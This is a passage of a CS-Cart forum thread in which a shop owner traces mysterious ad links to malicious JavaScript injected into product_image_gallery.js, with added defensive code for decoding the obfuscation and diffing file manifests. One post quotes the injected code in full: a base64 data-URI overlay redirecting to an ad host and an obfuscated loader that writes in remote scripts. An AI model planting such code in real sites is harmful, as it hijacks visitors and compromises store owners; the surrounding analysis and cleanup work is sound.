Malicious Advert Link In My Pages

 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 03 April 2017 - 08:51 AM #1

Though my site is scanned and appears clean by various scanners, I have some links to 2 ads on my pages that I don't know how they got there. They are not showing on view source for the page, can anyone help me how to find them and remove them? I have pasted images of the links so they are not linked.

first one (you can see the page it looks like it should be on), https://www.hivis.co...is-jackets.html

I did add a link for a dev to CMS magazine a while back and am unsure if this has anything to do with it

 

Thanks

John

Attached Thumbnails

  • malicious 1.JPG
  • maliscious 2.JPG

Custom printed hi visibility clothing sale the UK's online hivis safety shop
v3.06 - v4.3.6


 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3,372 posts

Posted 03 April 2017 - 10:23 AM #2

The adplexmedia is associated with your American Express/PayPal image.  I can't find the other one.

 

Edit:  It's actually an iframe, not the image.  Frame info shows this link https://www.multimat...Addon.php?t=1. Here's the source.

<div id='imageSection'></div><a href='data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPndpbmRvdy5sb2NhdGlvbi5ocmVmID0gImh0dHBzOi8vYWRwbGV4bWVkaWEuYWRrMnguY29tL2ltcD9wPTc0NTk2MjM1JmN0PWh0bWwmYXA9MTMwNCI8L3NjcmlwdD4=' style='position:absolute; width:50%; height:100%; top:0; right:0; z-index:99999;' target='_blank'></a><script type="text/javascript">
function imageLoad(s){
var s1=unescape(s.substr(0,s.length-1)); var t='';
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
var code="imageLoad('*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*8J*5F%7Bfw*75fiUfwfrx*75*8I*75*%3CGu*8F*75*7%3C%3C9%3A%3E%3B785*7%3C*7H*75xn%7Fj*8F*75*7%3C855%7D7%3A5*7%3C*7H*75xjw%7Bjwitrfns*8F*75*7%3Cfiuqj%7Drjinf*7%3C*75*7H*75xjhzwj*8Fywzj*75*75*%3CI*8G*5F*8H4xhwnuy*8J*5F*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*75xwh*8I*7%3Cmyyux*8F44fiuqj%7Drjinf3fip73ht4fiuqj%7Drjinf4yflx4%7Dgfssjw4%7Dgfssjw3ox*8Kfu*8I6855*7%3C*8J*8H4xhwnuy*8J5');";
var code2="imageLoad('*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*8J*5F%7Bfw*75fiUfwfrx*75*8I*75*%3CGu*8F*75*7%3C%3C9%3A%3E%3B785*7%3C*7H*75xn%7Fj*8F*75*7%3C855%7D7%3A5*7%3C*7H*75xjw%7Bjwitrfns*8F*75*7%3Cfiuqj%7Drjinf*7%3C*75*7H*75xjhzwj*8Fywzj*75*75*%3CI*8G*5F44htrrjsy*5F*8H4xhwnuy*8J*5F*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*75xwh*8I*7%3Cmyyux*8F44fiuqj%7Drjinf3fip73ht4fiuqj%7Drjinf4yflx4%7Dgfssjw4%7Dgfssjw3ox*8Kfu*8I6855*7%3C*8J*8H4xhwnuy*8J*5F5');";
var script = document.createElement('script');
script.innerHTML=code;

var script2 = document.createElement('script');
script2.innerHTML=code2;

var des=document.getElementById('imageSection')
des.appendChild(script);
des.appendChild(script2);
</script>
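
The `imageLoad` routine in the source posted above can be reversed offline without running it in a browser. This is an added example, not part of the original thread or of CS-Cart: a Node.js static decoder whose function names are hypothetical, run on the final `<script>` tag of the posted `code` value with its trailing key digit.

```javascript
// Static decoder for the imageLoad() obfuscation quoted in the thread.
// Nothing is evaluated or written to a page; the payload only becomes text.

// Percent-decode %XX sequences (the part of unescape() this payload relies on).
function pctDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Mirror of imageLoad(): the last character is a one-digit shift key; the rest
// is percent-decoded, each character shifted down by the key, then decoded again.
function decodeImageLoad(arg) {
  const key = arg.slice(-1);
  if (!/^[0-9]$/.test(key)) throw new Error('trailing key is not a digit');
  const stage1 = pctDecode(arg.slice(0, -1));
  let shifted = '';
  for (let i = 0; i < stage1.length; i++) {
    shifted += String.fromCharCode(stage1.charCodeAt(i) - Number(key));
  }
  return pctDecode(shifted);
}

// Pull every imageLoad('...') argument out of a suspicious file's text.
function findImageLoadArgs(source) {
  return [...source.matchAll(/imageLoad\('([^']*)'\)/g)].map(m => m[1]);
}

// External script URLs in decoded markup, for review or blocking.
function scriptSources(html) {
  return [...html.matchAll(/<script[^>]*\ssrc=['"]([^'"]+)['"]/gi)].map(m => m[1]);
}

// Decode every payload in a file and summarise what it would have loaded.
function analyse(source) {
  return findImageLoadArgs(source).map(arg => {
    const decoded = decodeImageLoad(arg);
    return { decoded, hosts: scriptSources(decoded).map(u => new URL(u).hostname) };
  });
}

// Sample: final <script> tag of the posted `code` value plus its key digit "5".
const SAMPLE = "var code=\"imageLoad('*8Hxhwnuy*75y%7Euj*8I*7%3Cyj%7Dy4of%7Bfxhwnuy*7%3C*75xwh*8I*7%3Cmyyux*8F44fiuqj%7Drjinf3fip73ht4fiuqj%7Drjinf4yflx4%7Dgfssjw4%7Dgfssjw3ox*8Kfu*8I6855*7%3C*8J*8H4xhwnuy*8J5');\";";

console.log(JSON.stringify(analyse(SAMPLE), null, 2));
```

Running the same `analyse` over the text of any modified `.js` file lists the third-party hosts the injected code pulls scripts from.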


 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 03 April 2017 - 01:45 PM #3

cheers Tool




 
  • demeldoo
  • Senior Member
  • Members
  • Join Date: 27-Jul 12
  • 859 posts

Posted 03 April 2017 - 02:53 PM #4

> cheers Tool

you should probably contact cs cart team to inspect this



 
  • imac
  • CTO
  • CS-Cart Architects
  • Join Date: 22-Nov 05
  • 1,595 posts

Posted 04 April 2017 - 09:06 AM #5

> Though my site is scanned and appears clean by various scanners, I have some links to 2 ads on my pages that I don't know how they got there. They are not showing on view source for the page, can anyone help me how to find them and remove them? I have pasted images of the links so they are not linked.
>
> first one (you can see the page it looks like it should be on), https://www.hivis.co...is-jackets.html
>
> I did add a link for a dev to CMS magazine a while back and am unsure if this has anything to do with it
>
> Thanks
>
> John

I could not find the kuaptr.com link on your site.

If you can still see it, please contact tech support.

As a possible case, it could be an XSS link when you open your site page by a link from an email or some forum.


Ilya Makarov,
CS-Cart Architect Team
Suggest and vote for new features | Report a bug

 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 04 April 2017 - 01:05 PM #6

> I could not find the kuaptr.com link on your site.
>
> If you can still see it, please contact tech support.
>
> As a possible case, it could be an XSS link when you open your site page by a link from an email or some forum.

I disabled the block for that image imac, I will contact support




 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3,372 posts

Posted 04 April 2017 - 03:31 PM #7

John, it's not the paypal image as I re-stated in my first post.  There is something along the entire right side of your page.  I think it has something to do with the page up.?



 
  • martfox
  • Member
  • Authorized Reseller
  • Join Date: 15-Jan 10
  • 378 posts

Posted 04 April 2017 - 06:31 PM #8

Seems like a malware

 

https://malwr.com/an...DEwZjcxZTJjOTI/


CS-Cart with 1 Year FREE Web Hosting | CS-Cart optimized SSD Cloud VPS Servers from €10.00/month
.
VPS SSD Cloud from €10.00 *** Dedicated Servers *** CS-Cart Authorized Reseller and Web Hosting Provider


 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 04 April 2017 - 09:47 PM #9

> John, it's not the paypal image as I re-stated in my first post.  There is something along the entire right side of your page.  I think it has something to do with the page up.?

Sorry, I thought you meant the amex image, I'll give it a look, cheers.

Disabled the easy scroll, do you still see it, Tool?

John




 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3,372 posts

Posted 04 April 2017 - 10:29 PM #10

It's no longer along the entire right side but it is still at the bottom right side.  Just hover in the area and you will see it.



 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3,372 posts

Posted 04 April 2017 - 10:50 PM #11

I just discovered that it's on the bottom left too but you can only see it with the browser inspector.



 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 05 April 2017 - 08:01 AM #12

Thanks Tool,

Update this morning: CS support have said it has sorted it for me.

> We have examined this issue. The malicious code was added into the js/tygh/product_image_gallery.js. We have backed up your file and uploaded the original one. Now the issue does not reproduce.
>
> Please check it and let me know the result.

Next question, how did it get there, and how do I shore it up so it doesn't happen again, is it something I've done or was it part of the image gallery addon?

I've changed all passwords etc




 
  • martfox
  • Member
  • Authorized Reseller
  • Join Date: 15-Jan 10
  • 378 posts

Posted 05 April 2017 - 08:21 AM #13


> Next question, how did it get there, and how do I shore it up so it doesn't happen again, is it something I've done or was it part of the image gallery addon?

Hi, you should enable mod_security on your server. It will help to block most spammers and hackers from putting injected code into your files, or creating new files with malicious code.




 
  • imac
  • CTO
  • CS-Cart Architects
  • Join Date: 22-Nov 05
  • 1,595 posts

Posted 05 April 2017 - 08:43 AM #14

> Thanks Tool,
>
> Update this morning: CS support have said it has sorted it for me.
>
> Next question, how did it get there, and how do I shore it up so it doesn't happen again, is it something I've done or was it part of the image gallery addon?
>
> I've changed all passwords etc

I've taken a look at your server.

Looks like all js files were changed or uploaded on Nov 4, 2016. Besides, as far as I can see, permissions on these files are OK.

But I see some other suspicious files on your server like json_post.php. Also there is prepare.php, why?

So my recommendation is to clear all the odd files and after that change all passwords once again.

Please use Changes Detector in order to make sure you don't have some other suspicious changes.


Ilya Makarov,
CS-Cart Architect Team
Suggest and vote for new features | Report a bug
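
One way to look for the kind of changed and extra files described in the post above, as an added example that is not CS-Cart's Changes Detector or any code from the thread: diff a `sha256sum` manifest taken from a clean copy of the same release against one taken from the live web root. The digests are constructed placeholders, and `js/tygh/example.js` and `index.php` are made-up paths; the other file names come from the thread.

```javascript
// Compare two `sha256sum`-style manifests: one from a clean copy of the same
// release, one from the live web root. Pure text processing, no file access.

// Parse "<64 hex digits>  <path>" lines into a Map of path -> digest.
function parseManifest(text) {
  const entries = new Map();
  for (const line of text.split('\n')) {
    const m = /^([0-9a-f]{64}) [ *](.+)$/.exec(line.trim());
    if (m) entries.set(m[2].replace(/^\.\//, ''), m[1]);
  }
  return entries;
}

// Classify every path as modified, added (only on the live site) or missing.
function diffManifests(cleanText, liveText) {
  const clean = parseManifest(cleanText);
  const live = parseManifest(liveText);
  const report = { modified: [], added: [], missing: [] };
  for (const [path, digest] of live) {
    if (!clean.has(path)) report.added.push(path);
    else if (clean.get(path) !== digest) report.modified.push(path);
  }
  for (const path of clean.keys()) {
    if (!live.has(path)) report.missing.push(path);
  }
  for (const list of Object.values(report)) list.sort();
  return report;
}

// Constructed sample manifests; each digest is a repeated placeholder character.
const h = c => c.repeat(64);
const CLEAN = [
  `${h('a')}  ./js/tygh/product_image_gallery.js`,
  `${h('b')}  ./js/tygh/example.js`,
  `${h('c')}  ./index.php`,
].join('\n');
const LIVE = [
  `${h('d')}  ./js/tygh/product_image_gallery.js`,
  `${h('b')}  ./js/tygh/example.js`,
  `${h('c')}  ./index.php`,
  `${h('e')}  ./json_post.php`,
  `${h('f')}  ./private.php`,
].join('\n');

console.log(diffManifests(CLEAN, LIVE));
```

Files reported as `added` are not part of the release and need a manual decision; files reported as `modified` can be restored from the clean copy after a backup is taken for analysis.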

 
  • johnbol1
  • Never Re
  • Members
  • Join Date: 23-Feb 10
  • 3,961 posts

Posted 05 April 2017 - 08:54 AM #15

> I've taken a look at your server.
>
> Looks like all js files were changed or uploaded on Nov 4, 2016. Besides, as far as I can see, permissions on these files are OK.
>
> But I see some other suspicious files on your server like json_post.php. Also there is prepare.php, why?
>
> So my recommendation is to clear all the odd files and after that change all passwords once again.
>
> Please use Changes Detector in order to make sure you don't have some other suspicious changes.

Not sure about the json_post.php, it says wordpress info in it so I have downloaded that,

prepare.php is probably left over from cs v 2.12

There is also a file on there, private.php, from 20th Feb 2017, looks like a php test script, can this be removed?

http://prntscr.com/esnnyo

Thanks for taking a look

